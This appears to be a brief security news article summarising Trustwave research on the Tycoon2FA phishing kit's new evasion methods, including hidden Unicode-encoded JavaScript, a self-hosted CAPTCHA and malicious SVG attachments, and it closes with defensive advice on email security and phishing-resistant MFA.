The Tycoon2FA phishing-as-a-service (PhaaS) platform has evolved with new updates, making it more sophisticated and harder to detect. Discovered by Sekoia researchers in October 2023, Tycoon2FA initially gained attention for bypassing multi-factor authentication (MFA) on Microsoft 365 and Gmail. Trustwave has reported that updates to the platform now improve its stealth and evasion capabilities, further enhancing its effectiveness in bypassing detection mechanisms.
One of the major changes is the use of invisible Unicode characters to hide binary data within JavaScript. This tactic, first reported by Juniper Threat Labs, allows the payload to remain undetected by static pattern-matching analysis and evade manual review. As a result, the malicious code executes normally at runtime, making detection significantly more difficult for security teams. This evasion strategy adds another layer of complexity to the phishing kit’s design.
Additionally, the platform has switched from using Cloudflare Turnstile to a self-hosted CAPTCHA system rendered via HTML5 canvas.
This change enhances the platform’s ability to bypass security tools designed to flag suspicious domains. By using a self-hosted CAPTCHA, Tycoon2FA allows for more customization and reduces the risk of detection by domain reputation systems, making the phishing kit harder to trace and shut down.
Trustwave also notes an increase in phishing attacks using malicious SVG files, facilitated by Tycoon2FA and other PhaaS platforms.
These SVG files, often disguised as voice messages or cloud document icons, contain obfuscated JavaScript that redirects users to fake login pages. The growing use of SVG files in phishing attacks signals a shift in tactics, making it essential for organizations to implement robust email security measures and phishing-resistant MFA solutions like FIDO-2 devices.
